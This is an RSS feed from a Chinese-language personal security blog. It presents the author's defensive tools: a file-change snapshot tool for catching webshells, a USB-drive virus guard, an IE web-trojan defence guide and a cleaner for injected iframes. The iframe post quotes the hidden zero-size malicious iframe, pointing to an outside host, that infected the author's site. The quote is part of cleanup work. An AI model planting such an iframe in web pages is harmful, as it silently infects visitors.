<![CDATA[单克隆抗体's blog]]> http://www.dklkt.cn/ en LBS v2.0.31X Thu, 09 Sep 2010 12:58:22 +0800 60 <![CDATA[[原创]文件夹差异比较工具v1.0]]> ]]> Mon, 16 Nov 2009 13:32:01 +0800


用法很简单,首先选择一个目录,生成快照。一段时间使用之后,再对这个目录生成快照。然后比较这两个快照,就可以知道哪些文件修改了,哪些文件增加了。

应用主要有以下两个方面,一是定期扫描系统敏感目录如c:\windows\system32生成快照,看看有没有什么文件变化。二是网站主定期扫描自己的www目录,这样,人家在你的网站留webshell或者一句话木马就可以轻易发现。

本软件的实现方法也很简单,就是在扫描时,计算目录下所有文件的MD5值,然后存入数据库。比较两个快照就是从数据库中比较数据的变化,几条select语句就可以搞定。

希望大家喜欢!
点击下载]]> <![CDATA[[原创]一个简易的文件加密工具FileCrypt v1.0]]> ]]> Mon, 18 Aug 2008 21:48:24 +0800
以下是帮助界面:
引用
====================================================
       File Encrypt Tool  V1.0         Written by dklkt.
====================================================
 Usage:
     Filecrypt <Options> <Password> <FilePath> [<outFilePath>]
 Options:     -e      Encrypt File.
              -d      Decrypt File.
]]> <![CDATA[[原创]东南网安屏幕广播程序]]> ]]> Wed, 30 Jul 2008 21:56:55 +0800


花了一个多星期,总算可以告一段落了~

大家从标题栏就可以大概看出是干什么的吧。一个在线教学工具。就是象以前中学上计算机课的时候,老师用一个软件,把同学们的屏幕都弄得跟老师的一样,这样,老师就可以在他的机子上给大家演示一些东西啦。

马上东南网安有会有一批新的成员加入我们的团队中来,为了给他们创造良好的培训条件。所以受下任会长所托,我写出了这个工具。主要的用途就是拉一批人到学校机房去,然后一个人开服务端,其它同学用客户端连上,搞在线实例教学^_^

写这个工具收获不少,下面简单说说我印象深刻的一些地方吧。呵呵。

首先,最开始考虑的问题就是选择哪种屏幕传输算法。因为考虑到会有很多客户端连接,为了更好的组织客户端,而且为了尽可能]]> <![CDATA[[原创]文件解锁工具(绿色版)]]> ]]> Sun, 13 Jul 2008 20:32:55 +0800
技术上没有什么创新,主要是参考了cbns888的《在Ring3上实现文件碎甲(解锁)功能》一文。原文链接为http://www.xfocus.net/articles/200708/935.html 

另外,感谢邪恶八进制的风泽写的程序dhfile.exe和nevergone的逆向代码。代码基本上是用他们的,我只是做了个界面而已。方便使用。

希望大家喜欢~



点击下载

程序没有进行过多测试,如果有bug请告诉我^_^]]> <![CDATA[[原创]U盘防火墙 v2.11]]> ]]> Fri, 02 Nov 2007 10:22:38 +0800
v2.0 改进了对带参数运行的病毒的监测。同时优化了查毒速度和自动打开的时间。欢迎大家试用并提出宝贵意见!
v2.1 增加自动打开U盘时的容错功能,没有延时直接打开。
       增加只运行一个实例的功能。
       改用VS2005编译。
v2.11 因为存在发布问题,重新改用VC6编译。


点击下载]]> <![CDATA[DropMyRights GUI版/图形版  下载]]> ]]> Thu, 25 Oct 2007 22:17:23 +0800
因为上次网安的讲座提到了它,所以我今天晚上花了点时间,把它写成了图形版,功能上没有变化,只是更方便使用。

希望大家喜欢~ ^_^


点击下载]]> <![CDATA[轻轻松松防范网马  再不用担心ie漏洞了]]> ]]> Wed, 26 Sep 2007 20:20:35 +0800 作者: 单克隆抗体
如需转载,请注明作者及来源 http://www.dklkt.cn/

    我们知道,因为全球使用ie浏览器的人不在少数,因此,黑客们一直把目光放在ie浏览器的漏洞上。像MS06014、MS07004和ANI漏洞都属于此列。 利用这些漏洞,黑客们只需精心构造特定的网页。然后在任何网站挂上它们,那么只要没有打补丁的用户用ie浏览该网站都有中毒的危险。

    不过通常不是中毒,而是中像“灰鸽子”一样的反弹木马以便黑客控制。

    为了解决这个问题,不用ie为内核的浏览器是一个办法。但对于我这样的懒人来说,还是ie用的方便快速。firefox感觉有点慢。

    不过有人会说,我把微软的补丁都打上不就ok了吗?话不能这么说,打上当然是对的。但是现在ie的漏洞越来越难发现,黑客的目光已经转移到了他们使用的插件了,像QQ ]]> <![CDATA[清理网马的收获----iframe网马批量清除工具]]> ]]> Tue, 31 Jul 2007 15:07:27 +0800 病毒把网站上每个asp/aspx/htm/html/js/txt文件最后都加上了<iframe src=http://xxx.18dmm.com/newdm/new05.htm?075 width=0 height=0></iframe>网站上有几千个文件,一个一个清还不把我累死啦。不行,得写程序了。

本想操起c++就开始搞的,突然发现网站服务器又不是自己家的,花银子买的空间。怎么会让我运行exe程序。看来得用asp了,没办法asp实在太菜,先去网上找找再说。每次碰到问题,我总是这样想的:既然这个问题我碰到了,而它又不是个很生僻的问题,别人肯定也碰到过。嘿嘿。于是google了半天。。。

发现下载下来的几个程序都不很理想,要不是操作太麻烦,就是清除后网站就不能正常运行了。唉~搞了好久,发现别人的东西还是用得不爽。干脆吸取各个优点,把它们改进了下。嘿嘿。不敢独享,特拿出来希望对同被此问题困扰的站长有点作用。
]]> <![CDATA[简易FTP服务器]]> ]]> Tue, 17 Jul 2007 09:29:41 +0800

点击下载

关于ftp的学习资料,网上有不少,不过最好还是看看RFC959  http://www.faqs.org/rfcs/rfc959.html

下一个目标http!]]> <![CDATA[感谢!]]> ]]> Sat, 07 Jul 2007 15:44:05 +0800 单克隆抗体的博客从今天起正式安家落户啦,欢迎大家常来!

感谢××TV,×TV给我这个机会,在此,要特别鸣谢我亲爱的爸爸妈妈,爷爷奶奶。没有你们,就没有我,就没有我的blog。还要鸣谢我的兄弟姐妹给予的大力支持和关心鼓励。还有曾经大力帮助过我的亲爱的同学和社团里的朋友,没有你们,就没有这个blog,谢谢你们!

另外,也要感谢写出这么简洁安全高效的LBS blog的作者SiC,以及提供 ExoBUD MP(II) 播放器的作者Jinwoong Yu,还有设计这款LBS风格的XiaoChuan,和写出各种插件的作者,感谢你们。有了你们辛勤的付出,才有了我今天的blog。我会努力向你们学习,写一点自己的东西。]]>